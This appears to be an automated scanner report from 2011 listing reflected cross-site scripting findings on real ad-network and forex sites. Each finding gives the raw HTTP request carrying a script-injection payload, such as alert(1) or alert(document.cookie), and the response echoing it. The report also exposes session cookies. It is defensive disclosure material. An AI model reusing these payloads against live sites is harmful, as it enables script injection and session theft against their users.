<HTML> <!-- Lotus-Domino (Release 5.0.7 - March 21, 2001 on OS/400) --> <HEAD> <TITLE>Error</TITLE></HEAD> <BODY TEXT="000000"> <H1>Error 404</H1>HTTP Web Server: Couldn't find design note - favicon.ico6e157<script>alert(1)</script>5c4cfcc19e5 <P> ...[SNIP]...
4.135. http://mittelstandsblog.de.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mittelstandsblog.de.intellitxt.com
Path:
/intellitxt/front.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10a08'-alert(1)-'be15936147 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /intellitxt/front.asp?ipid=12476&10a08'-alert(1)-'be15936147=1 HTTP/1.1 Host: mittelstandsblog.de.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wgAAAEt/BHAxgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Thu, 07-Apr-2011 17:42:57 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wgAAAEt/BHAxgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Thu, 07-Apr-2011 17:42:57 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sun, 06 Feb 2011 17:42:57 GMT Connection: close Content-Length: 10840
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3ea5f%3balert(1)//8bfd083d5b1 was submitted in the jscallback parameter. This input was echoed as 3ea5f;alert(1)//8bfd083d5b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/context?ts=1297012242449&refurl=http%3A%2F%2Fwww.mittelstandsblog.de%2F%3Fd18cb%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E02e0a7e96b%3D1&sid=58d2fde4057a419f8cd4ad4795d5a8b6&pvu=C3AF2E3D4E1146B8974E405F35226C60&pvm=8a7331184274a824066e86cbab026539&ipid=12476&cc=us&rcc=us®=tx&dma=623&city=Dallas&dat=6%2C12%2C18&pagecl=15442&jsoncl=9826&ppc=-1&hn=36&chunkkey=12476:58d2fde4057a419f8cd4ad4795d5a8b6:4CD59B7A613C41A19879C8AC98480C80:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A1%2Cc%3A%22Die%20Bedrohung%20durch%20einen%20m%25C3%25B6glichen%20Krieg%20der%20Computer%20%25E2%2580%2593%20den%20sogenannten%20Cyberwar%20%25E2%2580%2593%20erfordert%20nach%20Meinung%20des%20Branchenverbands%22%7D%2C%7Bt%3A%22std%22%2Cn%3A2%2Cc%3A%22eine%20enge%20Kooperation%20staatlicher%20Stellen%20mit%20der%20ITK-Wirtschaft.%20Nicht%20von%20ungef%25C3%25A4hr%20ist%20Cyberwar%20in%20diesem%20Jahr%20Schwer%25C2%25ADpunkt%25C2%25ADthema%20der%20M%25C3%25BCnchner%20Sicherheitskonferenz.%20Prof.%20Dieter%20Kempf%20vom%20BITKOM-Pr%25C3%25A4%25C2%25ADsi%25C2%25ADdium%3A%20%25E2%2580%259EDer%20Schutz%20gegen%20Cyberattacken%20l%25C3%25A4sst%20sich%20rein%20milit%25C3%25A4risch%20nicht%20darstellen%2C%20da%20hier%20zivile%20und%20milit%25C3%25A4rische%20Sicherheit%20verschmelzen.%25E2%2580%259C%20Daher%20sei%20eine%20enge%20Zusammenarbeit%20zwischen%20zivilen%20und%20milit%25C3%25A4rischen%20Stellen%20unumg%25C3%25A4nglich.%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A3%2Cc%3A%22Die%20Reall%25C3%25B6hne%20stiegen%20in%20Deutschland%202010%20gegen%25C3%25BCber%20dem%20Vor%25C2%25ADjahr%20um%20durchschnittlich%201%2C4%C2%A0%2525.%20Das%20meldete%20heute%20das%22%7D%2C%7Bt%3A%22std%22%2Cn%3A4%2Cc%3A%22.%20Damit%20kehrte%20sich%20die%20Entwicklung%20der%20Verdienste%20im%20Jahr%202009%20um.%20Vor%20zwei&chunk=0&total=10&jscallback=$iTXT.js.callback13ea5f%3balert(1)//8bfd083d5b1 HTTP/1.1 Host: mittelstandsblog.de.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wgAAAEt+/NP3wA-"
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Content-Length: 63 Date: Sun, 06 Feb 2011 17:48:05 GMT Connection: close
The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f9eec%3balert(1)//be4b7b0d465 was submitted in the callback parameter. This input was echoed as f9eec;alert(1)//be4b7b0d465 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http%3A//burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=428&loc=205,1872&output=simplejs&callback=ch_ad_render_searchf9eec%3balert(1)//be4b7b0d465 HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:03:14 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/SkJTIFoxB5zyrGvNoopWGJl7QqE309Lqf5eXifPARwpNoUujY2E+2KxY6QzBEF1jrMM9Le/5uS8vk3/0yfsC9LcwIQYqSX9iGj4pM2QhVMx+yQOJvlLcVJjMdcecy35E5O6HNzZmRmk3bTCYrYwTKa9T8x/sq7Uacd3idTy2Q70rTwd0fEIBEV/Ru0SliL9b/pLlazUTJc00i+uYgY9Ak75gw7U7vQBlsKmIETIL6DKGsRvXi6m0gPKikPNmAKkOGEwbxbrsiiIVOjmt5Bhh/y/4wfvoaYe/7LK/wxK91Hbfct4rQgUAT18IBlX2FsPJrdVKyNMroVM9A221zVtGOhn4JCqLeYFSsYGrdfEhGLOWFxM2Ig65OkOIDGI9mV9dqnUS6ne0WPIUjhR6aWQUA29ZRmmR4Xum34q41ZPj2mU6b5.WgeSdw8dF7NxJIHZwzf9uA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:03:14 GMT Vary: Accept-Encoding Connection: close Content-Type: application/x-javascript; charset=utf-8 Content-Length: 19362
var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=home-warranty.firstam.com,homewarran ...[SNIP]... </html>\n","cb":"428"};ch_ad_render_searchf9eec;alert(1)//be4b7b0d465();
The value of the output request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 621be"><script>alert(1)</script>ac55a9221bd was submitted in the output parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http%3A//burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=428&loc=205,1872&output=simplejs621be"><script>alert(1)</script>ac55a9221bd&callback=ch_ad_render_search HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:57 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/SkJbIF4hBljrVeurtwIS0m4qSGm2e877NAI6f8fuEjdZOAXv/FnXqCC0BG566F0elAxvUHTaCTUEvE5ToHMsgNd2S8eAZISnLRZ3rquKZAszvJ+0ezAy5e+EgARK63ng5O6Yc3rDNZZ3kGv6nIxTOa/WNlsSBxecOT3xrb+mA307UyVs8w1PKXest+nN80acd9zQrTaMICnDQm2K4dEgk65gw1s5vQeW+lHSS0n1BuszD3QLaHFKor8P75FuQwV0enr980PLLkXwuK2YNi/oKG5lgiFYdu6PQzrh4AyikSl7jyWCHNvVp51KVAOaueFwgTVmH4n/Qrk2GivNs7S0NPCuW93M7YB21dbIS6ZlZqccuwMr0BUdgJ0/9K9UfRv2EWho293T2AfJgKGzBfcIdx9+SWEPjGoe2vx0S6ONyrcg==.RHUBxk7mgchYjm9uim6etg.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:02:57 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]... &cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=428&loc=205,1872&output=simplejs621be"><script>alert(1)</script>ac55a9221bd&callback=ch_ad_render_search" method="get" id="searchBox" name="searchBox"> ...[SNIP]...
The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload b63cd<script>alert(1)</script>161eef63f29 was submitted in the slotname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gampad/ads?correlator=1296942576071&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-0829525646633902&slotname=ORTHO_Start_TopLeaderboardb63cd<script>alert(1)</script>161eef63f29&page_slots=ORTHO_Start_TopLeaderboard&cookie_enabled=1&ga_vid=1188681698.1296942576&ga_sid=1296942576&ga_hid=728612317&url=http%3A%2F%2Fwww.orthosupersite.com%2F&lmt=1296964176&dt=1296942576072&cc=14&biw=985&bih=1012&ifi=1&adk=3931591226&u_tz=-360&u_his=1&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103 HTTP/1.1 Host: pubads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.orthosupersite.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 05 Feb 2011 21:51:26 GMT Server: gfp-be Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 2764
GA_googleSetAdContentsBySlotForSync({"ORTHO_Start_TopLeaderboardb63cd<script>alert(1)</script>161eef63f29":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d556e'%3b0652dbe18d0 was submitted in the REST URL parameter 3. This input was echoed as d556e';0652dbe18d0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /anst/s/oiqrmb.jsd556e'%3b0652dbe18d0 HTTP/1.1 Host: px.owneriq.net Proxy-Connection: keep-alive Referer: http://www.owneriq.com/ownership-targeting?src=728x90_blue Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; si=7431457a-2008-4af6-823b-5fab70668c12; oxuuid=a9147669-7acb-495a-a7a7-b8a2e6b13599; ss=2n78c.6f2tf.6qa; gguuid=CAESEJ1QzO8syyE54_azrc6wYSw
Response
HTTP/1.1 200 OK Server: Apache/2.2.15 (Fedora) X-Powered-By: PHP/5.2.13 Content-Type: application/x-javascript Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 22:58:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 22:58:57 GMT Connection: close Content-Length: 2278
function oiq_addPageMfg(s){ window.oiq_pMfg = s; } function oiq_addPageBrand(s){ window.oiq_pMfg = s; } function oiq_addPageDT(s) { if(!window.oiq_pDT) {window.oiq_pDT = new Array();} window.oiq_pDT.p ...[SNIP]... h('d|"'+encodeURIComponent(window.oiq_pDT[i])+'"')}} if (window.oiq_pProduct) t.push('p|"'+encodeURIComponent(window.oiq_pProduct)+'"'); } var req='http://px.owneriq.net/j/'+'?pt=oiqrmb.jsd556e';0652dbe18d0'+'&t='+encodeURI(t.join()); if (window.oiq_pSource) req+='&s='+window.oiq_pSource; oiq_is(req); },1000); }
function oiq_onclick(m,d,p,s,o) { if (!m && !d && !p) return true; win ...[SNIP]...
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4892"%3balert(1)//f99faf2810f was submitted in the pt parameter. This input was echoed as a4892";alert(1)//f99faf2810f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /j/?pt=oiqrmba4892"%3balert(1)//f99faf2810f&t=m%7C%22owneriq%22&s=site HTTP/1.1 Host: px.owneriq.net Proxy-Connection: keep-alive Referer: http://www.owneriq.com/ownership-targeting?src=728x90_blue Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; si=7431457a-2008-4af6-823b-5fab70668c12; oxuuid=a9147669-7acb-495a-a7a7-b8a2e6b13599; ss=2n78c.6f2tf.6qa; gguuid=CAESEJ1QzO8syyE54_azrc6wYSw
Response
HTTP/1.1 200 OK Server: Apache/2.2.15 (Fedora) X-Powered-By: PHP/5.2.13 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sat, 05 Feb 2011 22:31:30 GMT Connection: close Content-Length: 1552
function isImageOk(img) { if (!img.complete) { return false; } if (typeof img.naturalWidth != 'undefined' && img.naturalWidth == 0) { return false; } return true; } var oiq_b = document.getElementsByT ...[SNIP]... cument.createElement("img"); oiq_i_1.setAttribute("src", "http://px.owneriq.net/p?sid%5B%5D=23331554&sid%5B%5D=53310589&sid%5B%5D=53310594&rid%5B%5D=862779&rid%5B%5D=1133555&rid%5B%5D=1133556&pt=oiqrmba4892";alert(1)//f99faf2810f"); oiq_i_1.setAttribute("width", "1"); oiq_i_1.setAttribute("height", "1"); oiq_f.appendChild(oiq_i_1); var oiq_i_2 = document.createElement("img"); oiq_i_2.setAttribute("src", "http://bid.openx.net/c ...[SNIP]...
The value of the css request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdb85"><script>alert(1)</script>c67b70ca19 was submitted in the css parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe5.php?css=http://www.forexyard.com/en/css/quotes-chart.cssbdb85"><script>alert(1)</script>c67b70ca19&img_prefix=35_30min&pairs=EURUSD,USDJPY,AUDUSD,USDCAD,GBPUSD,USDCHF&zone_id=4129 HTTP/1.1 Host: quotes.forexyard.com Proxy-Connection: keep-alive Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the img_prefix request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c2da"><script>alert(1)</script>79d70774517 was submitted in the img_prefix parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe5.php?css=http://www.forexyard.com/en/css/quotes-chart.css&img_prefix=35_30min9c2da"><script>alert(1)</script>79d70774517&pairs=EURUSD,USDJPY,AUDUSD,USDCAD,GBPUSD,USDCHF&zone_id=4129 HTTP/1.1 Host: quotes.forexyard.com Proxy-Connection: keep-alive Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the img_prefix request parameter is copied into an HTML comment. The payload 521c9--><script>alert(1)</script>05eaf2114c1 was submitted in the img_prefix parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /iframe5.php?css=http://www.forexyard.com/en/css/quotes-chart.css&img_prefix=35_30min521c9--><script>alert(1)</script>05eaf2114c1&pairs=EURUSD,USDJPY,AUDUSD,USDCAD,GBPUSD,USDCHF&zone_id=4129 HTTP/1.1 Host: quotes.forexyard.com Proxy-Connection: keep-alive Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FOREXYARD Live Forex ...[SNIP]... <img src="charts/35_30min521c9--><script>alert(1)</script>05eaf2114c1GRAPH_EURUSD_6_DAY_25.png" alt="Large Chart" border="0" /> ...[SNIP]...
4.145. http://quotes.forexyard.com/iframe5.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://quotes.forexyard.com
Path:
/iframe5.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98915"%3balert(1)//f9d420ddf1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 98915";alert(1)//f9d420ddf1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /iframe5.php?css=http://www.forexyard.com/en/css/quotes-chart.css&img_prefix=35_30min&pairs=EURUSD,USDJPY,AUDUSD,USDCAD,GBPUSD,USDCHF&zone_id=/98915"%3balert(1)//f9d420ddf1d4129 HTTP/1.1 Host: quotes.forexyard.com Proxy-Connection: keep-alive Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FOREXYARD Live Forex ...[SNIP]... <script type="text/javascript">var aff_url = "http://www.forexyard.com/index.php?zone_id=/98915";alert(1)//f9d420ddf1d4129";</script> ...[SNIP]...
4.146. http://quotes.forexyard.com/iframe5.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://quotes.forexyard.com
Path:
/iframe5.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efa17"><script>alert(1)</script>1c43b63a262 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe5.php?css=http://www.forexyard.com/en/css/quotes-chart.css&img_prefix=35_30min&pairs=EURUSD,USDJPY,AUDUSD,USDCAD,GBPUSD,USDCHF&zone_id=/efa17"><script>alert(1)</script>1c43b63a2624129 HTTP/1.1 Host: quotes.forexyard.com Proxy-Connection: keep-alive Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the pairs request parameter is copied into an HTML comment. The payload a51bb--><script>alert(1)</script>b772c65691c was submitted in the pairs parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
